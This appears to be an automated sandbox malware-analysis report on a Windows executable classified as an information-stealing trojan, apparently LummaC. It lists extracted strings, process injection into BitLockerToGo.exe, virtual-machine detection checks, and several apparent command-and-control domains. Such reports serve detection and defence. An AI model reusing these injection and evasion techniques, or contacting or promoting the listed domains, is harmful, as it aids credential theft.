Source: External2.4.exe	Binary string: 116415321826934814453125582076609134674072265625Albanian Albania (sq-AL)AllocateAndInitializeSidAlsatian France (gsw-FR)Amharic Ethiopia (am-ET)Armenian Armenia (hy-AM)AssignProcessToJobObjectAzerbaijan Standard TimeAzerbaijani (Latin) (az)Bangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32SnapshotCroatian Croatia (hr-HR)DatetimeGreaterThanOtherDatetimeToleranceToOtherDosDateTimeToVariantTimeEVENT_TYPE_CLIENT_HEADEREVENT_TYPE_SERVER_HEADEREnglish Malaysia (en-MY)English Zimbabwe (en-ZW)Estonian Estonia (et-EE)GenerateConsoleCtrlEventGeorgian Georgia (ka-GE)GetMaximumProcessorCountGetNamedPipeHandleStateWGetSystemTimeAsFileTimeGetUserProfileDirectoryWGetWindowThreadProcessIdGuarani Paraguay (gn-PY)Incorrect length writtenMagallanes Standard TimeMalformed method name %qMontevideo Standard TimeNested channel(id:%d) %sNorth Asia Standard TimeNorwegian (Nynorsk) (nn)NotNestedGreaterGreater;NtQuerySystemInformationOleCreatePictureIndirectPacific SA Standard TimeQuechua Bolivia (quz-BO)Quechua Ecuador (quz-EC)QueryPerformanceCounterRequest Entity Too LargeRomanian Moldova (ro-MD)Romanian Romania (ro-RO)SA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceSpacing Modifier LettersSpanish Colombia (es-CO)Spanish Honduras (es-HN)Spanish Paraguay (es-PY)StringGreaterThanOrEqualSupplemental PunctuationTLS_RSA_WITH_RC4_128_SHATigrinya Eritrea (ti-ER)US Eastern Standard TimeUnRegisterTypeLibForUserUnable to decode as JSONVariantTimeToDosDateTimeWSAAsyncGetProtoByNumberWSAWaitForMultipleEventsWert muss ein Array seinWindows boot application\Device\NamedPipe\cygwin^(?:[0-9]{7}X\|[0-9]{8})$_html_template_urlfilteraddress string too shortapplication/octet-streamapplication/x-ecmascriptapplication/x-javascriptat range loop continue: bad defer entry in panicbypassed recovery failedcan't scan our own stackcertificate unobtainablecode: %s, debug data: %qconnection reset by peercould not resolve %q: %vdisable-prompt-on-repostdouble traceGCSweepStarterror decrypting messageexec: Stderr already setexec: Stdout already setexpected float; found %sflate: maxBits too largefloating point exceptionframe_headers_prio_shortfunction not implementedgcDrainN phase incorrectgoogle.protobuf.Durationhash of unhashable type http2: canceling requestidna: disallowed rune %Uinvalid argument to Intninvalid array index '%s'invalid field number: %dinvalid pseudo-header %qinvalid register requestinvalid slice index '%s'json: unsupported type: level 2 not synchronizedlink number out of rangemail: double dot in atommismatching enum lengthsmissing likely tags datano-default-browser-checknot supported by windowson range loop re-entry: out of streams resourcespageAlloc: out of memoryproto: missing extensionproto: no coders for %v
Source: External2.4.exe	Binary string: Request Entity Too LargeRomanian Moldova (ro-MD)Romanian Romania (ro-RO)SA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceSpacing Modifier LettersSpanish Colombia (es-CO)Spanish Honduras (es-HN)Spanish Paraguay (es-PY)StringGreaterThanOrEqualSupplemental PunctuationTLS_RSA_WITH_RC4_128_SHATigrinya Eritrea (ti-ER)US Eastern Standard TimeUnRegisterTypeLibForUserUnable to decode as JSONVariantTimeToDosDateTimeWSAAsyncGetProtoByNumberWSAWaitForMultipleEventsWert muss ein Array seinWindows boot application\Device\NamedPipe\cygwin^(?:[0-9]{7}X\|[0-9]{8})$_html_template_urlfilteraddress string too shortapplication/octet-streamapplication/x-ecmascriptapplication/x-javascriptat range loop continue: bad defer entry in panicbypassed recovery failedcan't scan our own stackcertificate unobtainablecode: %s, debug data: %qconnection reset by peercould not resolve %q: %vdisable-prompt-on-repostdouble traceGCSweepStarterror decrypting messageexec: Stderr already setexec: Stdout already setexpected float; found %sflate: maxBits too largefloating point exceptionframe_headers_prio_shortfunction not implementedgcDrainN phase incorrectgoogle.protobuf.Durationhash of unhashable type http2: canceling requestidna: disallowed rune %Uinvalid argument to Intninvalid array index '%s'invalid field number: %dinvalid pseudo-header %qinvalid register requestinvalid slice index '%s'json: unsupported type: level 2 not synchronizedlink number out of rangemail: double dot in atommismatching enum lengthsmissing likely tags datano-default-browser-checknot supported by windowson range loop re-entry: out of streams resourcespageAlloc: out of memoryproto: missing extensionproto: no coders for %v

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_00436980 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

4_2_00436980

Source: External2.4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\External2.4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BitLockerToGo.exe, 00000004.00000003.2005500681.0000000005467000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2029743030.0000000005431000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: External2.4.exe

ReversingLabs: Detection: 52%

Source: External2.4.exe	String found in binary or memory: m not found in allmmail: no angle-addrmarking free objectmarkroot: bad indexmax buffer exceededmime: no media typemissing ']' in hostmissing deferreturnmspan.sweep: state=multipart/form-datamultipartmaxheadersnegative coordinateno such template %qnot a control
Source: External2.4.exe	String found in binary or memory: cennieseurovisionexecerrdotexitThreadextraspacefigcaptionfloat32nanfloat64nanformactionformmethodformtargetfoundationgetsockoptgo_packagegoroutine grpc.Recv.grpc.Sent.gtrapprox;gtreqless;gvertneqq;healthcareheartsuit;http-equivhttp_proxyimage/avifimage/jpegimage/webpimmobilienimpossibleindustriesinput_typeinstanceofinvalid IPinvalidptrisHostnameiso-8859-1jsonObjectkeep-alivekeySplineskeysplinesleftarrow;lesseqgtr;local-addrlvertneqq;mSpanInUsemanagementmediagroupmillenniummitsubishimultipart-mute-audiomyhostnamenanosecondnationwidenewhollandnextdirectngeqslant;nleqslant;notifyListnovalidatenparallel;nshortmid;nsubseteq;nsupseteq;numOctavesnumoctavesobj.when:[oneof_declothersExprowner diedpathLengthpathlengthpick_firstpitchfork;profInsertpropertiesprotectionprudentialradiogrouprationals;realestaterepublicanrestaurantroundrobinrune <nil>runtime: gs.state = schaefflerschedtracesemacquireset-cookiesetsockoptshort readskipping: spadesuit;spellcheckstackLargestrcountrystruninormsubseteqq;subsetneq;supseteqq;supsetneq;swiftcovert.Kind == tatamotorstechnologytelefonicaterminatedtext/plaintextLengthtextlengththerefore;time.Date(time.Localtracefree(tracegc()
Source: External2.4.exe	String found in binary or memory: .WithDeadline(.in-addr.arpa./log/filter.go/log/helper.go1907348632812595367431640625: extra text: ; SameSite=Lax<not Stringer>> closed by </ALREADY_EXISTSAccept-CharsetAfrikaans (af)Align 16-BytesAlign 32-BytesAlign 64-BytesAlign1024BytesAlign2048BytesAlign4096BytesAlign8192BytesAlsatian (gsw)ApplyFunction;AuthInfo: '%s'BrightnessDownBrowserForwardBrowserRefreshBstrFromVectorBulgarian (bg)CET CompatibleCertCloseStoreCherokee (chr)ClearCommBreakClearCommErrorCoInitializeExCoUninitializeComputerNameExContent-LengthControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCreateTypeLib2CryptGenRandomDatetimeFutureDifferentialD;Dkim-SignatureDoubleLeftTee;DoubleUpArrow;Extended LatinFID SuppressedFile is closedFilipino (fil)FindFirstFileWForceIntegrityFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetShellWindowGetTickCount64GetUserNameExWGreek ExtendedHaitian CreoleHawaiian (haw)Hungarian (hu)INTERNAL_ERRORIcelandic (is)InstEmptyWidthIsWellKnownSidIsWow64ProcessKiswahili (sw)LOGGER_UNKNOWNLaunchCalendarLaunchContactsLeftTeeVector;LeftVectorBar;LessFullEqual;LoadEventFiredLoadLibraryExWLoadRegTypeLibLongLeftArrow;Longleftarrow;MAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMalayalam (ml)MediaPlayPauseMediaTrackNextMessageOptionsModule32FirstWNegativeOrZeroNetUserGetInfoNot AcceptableNotEqualTilde;NotEqualsOtherNotTildeEqual;NotTildeTilde;NtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxPoincareplane;PositiveOrZeroPrecedesEqual;PrecedesTilde;Process32NextWQuotation_MarkRCodeNameErrorREFUSED_STREAMREQUEST_METHODRISC-V High 20RegSetValueExWRelocsStrippedReservedRangesResourceHeaderRightArrowBar;RightTeeArrow;RightTriangle;RightUpVector;SafeArrayRedimSerbo-CroatianServiceOptionsSetConditionIfSetConsoleModeSetFilePointerSetThreadTokenSizeofResourceSlovenian (sl)StringContainsStringEndsWithStringFileInfoStringLessThanStringNotBlankStringNotEmptySubConn(id:%d)SucceedsEqual;SucceedsTilde;SupersetEqual;SysAllocStringTranslateNameWUWOP_SET_FPREGUkrainian (uk)UpEquilibrium;VarBoolFromDecVarBoolFromStrVarBoolFromUI1VarBoolFromUI2VarBoolFromUI4VarBoolFromUI8VarBstrFromDecVarBstrFromUI1VarBstrFromUI2VarBstrFromUI4VarBstrFromUI8VarDateFromDecVarDateFromStrVarDateFromUI1VarDateFromUI2VarDateFromUI4VarDateFromUI8VarDecFromBoolVarDecFromDateVarDecFromDispVarUI1FromBoolVarUI1FromDateVarUI1FromDispVarUI2FromBoolVarUI2FromDateVarUI2FromDispVarUI4FromBoolVarUI4FromDateVarUI4FromDispVarUI8FromBoolVarUI8FromDateVarUI8FromDispVarWeekdayNameVariantCopyIndVectorFromBstrVerQueryValueWVerticalTilde;VeryThinSpace;VirtualAllocExVirtualProtectVirtualQueryExWSAAsyncSelectWSACreateEventWSAEventSelectWSASetServiceAWSASetServiceWWindows CE GUIXXX_OneofFuncsXXX_extensionsZenkakuHankaku"OUT_OF_RANGE"\.+*?()\|[]{}^$
Source: External2.4.exe	String found in binary or memory: mstartbad sequence numberbad unicode format bad value for fieldbinary.LittleEndianblacktriangleright;cc_generic_servicescedar: not have keycedar: not have valclient disconnectedconditionalVariantsconsumeAddrSpec: %qconsumePhrase: [%s]content-dispositioncriterion too shortdeprecation_warningdescriptor mismatchdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong PevictCount overflowexec: canceling Cmdexpired certificatefeComponentTransferfecomponenttransferfield %v is invalidfile already closedfile already existsfile does not existforce-color-profileframe_data_stream_0google.protobuf.Anyhttp: Server closedif-unmodified-sinceillegal instructioninvalid MAC addressinvalid Trailer keyinvalid URL escape invalid UUID formatinvalid blocklen %dinvalid data len %dinvalid key or typeinvalid nil pointerjava_multiple_fileslongleftrightarrow;m not found in allmmail: no angle-addrmarking free objectmarkroot: bad indexmax buffer exceededmime: no media typemissing ']' in hostmissing deferreturnmspan.sweep: state=multipart/form-datamultipartmaxheadersnegative coordinateno such template %qnot a control framenotesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panic
Source: External2.4.exe	String found in binary or memory: %s: nanos out of range %v(matr\|vert\|ind)(?:ix\|ex)$): bad bits after slash: 2006-01-02T15:04:05Z07:002910383045673370361328125ARM Thumb-2 little endianAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeBangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Chinese (Simplified) (zh)ClockwiseContourIntegral;Closing the name resolverContent-Transfer-EncodingCreateConsoleScreenBufferDari Afghanistan (prs-AF)DoubleLongLeftRightArrow;Dutch Netherlands (nl-NL)EVENT_TYPE_CLIENT_MESSAGEEVENT_TYPE_SERVER_MESSAGEEVENT_TYPE_SERVER_TRAILEREnglish Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)ExpandEnvironmentStringsWFindNextVolumeMountPointWFindVolumeMountPointCloseFrench Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)GODEBUG: can not enable "GRPC_GO_IGNORE_TXT_ERRORSGRPC_XDS_BOOTSTRAP_CONFIGGerman Luxembourg (de-LU)GetFinalPathNameByHandleWGetQueuedCompletionStatusGetRecordInfoFromTypeInfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityHangul Compatibility JamoHungarian Hungary (hu-HU)IPv4 field has value >255Icelandic Iceland (is-IS)InitiateSystemShutdownExWIsValidSecurityDescriptorJSON soll JSON-Array seinKaliningrad Standard TimeKazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)LPSAFEARRAY_UserUnmarshalLatin Extended AdditionalMIPS little-endian WCE v2Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Middle East Standard TimeMongolian (Cyrillic) (mn)New Zealand Standard TimeNorth Korea Standard TimeNtQueryInformationProcessPortuguese Brazil (pt-BR)QueryInformationJobObjectSerbian (Latin) (sr-Latn)SetSecurityDescriptorDaclSetSecurityDescriptorSaclSetswana Botswana (tn-BW)SetupDiCallClassInstallerSetupDiGetDevicePropertyWSetupDiGetSelectedDriverWSetupDiSetSelectedDriverWSinhala Sri Lanka (si-LK)South Sudan Standard TimeSpanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)String must contain %[1]sStringNoControlCharactersSubchannel(id:%d) createdSubchannel(id:%d) deletedTigrinya Ethiopia (ti-ET)Transbaikal Standard TimeUS Mountain Standard TimeUkrainian Ukraine (uk-UA)Ulaanbaatar Standard TimeUpdateProcThreadAttributeVladivostok Standard TimeW. Mongolia Standard TimeWert darf nicht leer seinWert darf nicht null seinWert muss ein Objekt seinXML syntax error on line Zulu South Africa (zu-ZA)^(?:[0-9]{9}X\|[0-9]{10})$_cgo_thread_start missing_html_template_cssescaper_html_template_urlescaper` Contents are null-bytesallgadd: bad status Gidlearena already initializedarray index out of boundsbad status in shrinkstackbad system huge page sizecan't evaluate command %qcan't print %s of type %scb27e3aa (May 26th, 2020)chansend: spurious wakeupcharset not supported: %qcheckdead: no m for timercheckdead: no p for timerclient transport shutdowncodec: packet size exceedcontext deadline exceededdone serving; Accept = %vecdsa: invalid public keyexpected string; found %sexplicit tag has no childform: Decode(non-pointer frame_data_pad_byte_short
Source: External2.4.exe	String found in binary or memory: tre un tableauMalay Brunei Darussalam (ms-BN)Mountain Standard Time (Mexico)Msg this(%v) Not Equal that(%v)Network Authentication RequiredPRIORITY frame with stream ID 0Request Header Fields Too LargeRequested Range Not SatisfiableResolver state updated: %s (%v)Sami (Northern) Finland (se-FI)Sami (Southern) Norway (sma-NO)Sami (Southern) Sweden (sma-SE)SetupDiGetDeviceInfoListDetailWString must be a valid hostnameString value must be valid JSONStringValidUnicodeNormalizationTLS_RSA_WITH_AES_128_CBC_SHA256TLS_RSA_WITH_AES_128_GCM_SHA256TLS_RSA_WITH_AES_256_GCM_SHA384Unexpected error reading readerValencian Spain (ca-ESvalencia)Value must be less than '%[1]s'Value must be same %[1]s as nowW. Central Africa Standard Timebad certificate status responsebad write barrier buffer boundsca-ES-valencia en-US-u-va-posixcannot assign requested addresscannot parse reserved wire typecannot reset invalid %v messagecasgstatus: bad incoming valuescheckmark found unmarked objectcoff symbols parsing failed: %vcrypto/ecdh: invalid public keydisable-ipc-flooding-protectiondns: %v record lookup error: %ventersyscallblock inconsistent expected colon after object keyfield %v contains invalid UTF-8fmt: unknown base; can't happenframe_headers_prio_weight_shortgoogle.protobuf.FieldMask.pathsgrpc: the connection is closinggrpc: the connection is drainedhttp2: connection error: %v: %villegal service config type: %Tin literal null (expecting 'l')in literal null (expecting 'u')in literal true (expecting 'e')in literal true (expecting 'r')in literal true (expecting 'u')internal error - misuse of itabinvalid Go type %v for field %vinvalid network interface indexjson: invalid number literal %qmail: missing '@' or angle-addrmalformed time zone informationmergeRuneSets odd length []runemissing argument for comparisonnil pointer passed to Unmarshalno JSON service config providedno_standard_descriptor_accessornon in-use span in unswept listnon-pointer passed to Unmarshalpacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %qproto: bad default int32 %q: %vproto: bad default int64 %q: %vproto: no coders for struct %T
Source: External2.4.exe	String found in binary or memory: @v1.5.6/loadconfig.go
Source: External2.4.exe	String found in binary or memory: @v1.64.1/internal/balancerload/load.go

Source: C:\Users\user\Desktop\External2.4.exe

File read: C:\Users\user\Desktop\External2.4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\External2.4.exe "C:\Users\user\Desktop\External2.4.exe"
Source: C:\Users\user\Desktop\External2.4.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\External2.4.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\External2.4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: External2.4.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: External2.4.exe

Static file information: File size 14573568 > 1048576

Source: External2.4.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x604800
Source: External2.4.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x69e000

Source: External2.4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: External2.4.exe, 00000000.00000002.1960437943.000000000B4CE000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: External2.4.exe, 00000000.00000002.1960437943.000000000B4CE000.00000004.00001000.00020000.00000000.sdmp

Source: External2.4.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043C830 push eax; mov dword ptr [esp], F5F4F3A2h	4_2_0043C833
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004438E8 push eax; retn 0041h	4_2_004438E9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00443340 push eax; retn 0041h	4_2_00443341
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00443334 push eax; retn 0041h	4_2_00443335
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00443338 push eax; retn 0041h	4_2_00443339
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004424E8 pushfd ; iretd	4_2_004424ED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004455DB pushad ; iretd	4_2_0044560D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0044560E push ebp; retf	4_2_00445677
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0044072C push 33B9AF99h; ret	4_2_00440731

Source: C:\Users\user\Desktop\External2.4.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6156	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6332	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000004.00000002.2157658912.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156907192.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: External2.4.exe, 00000000.00000002.1958357606.0000000001E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: BitLockerToGo.exe, 00000004.00000003.2157253427.0000000003133000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2117608539.0000000003133000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157770874.0000000003133000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003132000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000004.00000003.2157253427.0000000003133000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2117608539.0000000003133000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157770874.0000000003133000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003132000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWem

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_0043B1C0 LdrInitializeThunk,

4_2_0043B1C0

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\External2.4.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\External2.4.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: External2.4.exe, 00000000.00000002.1960437943.000000000B3A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: icyidentifysu.click

Writes to foreign memory regions

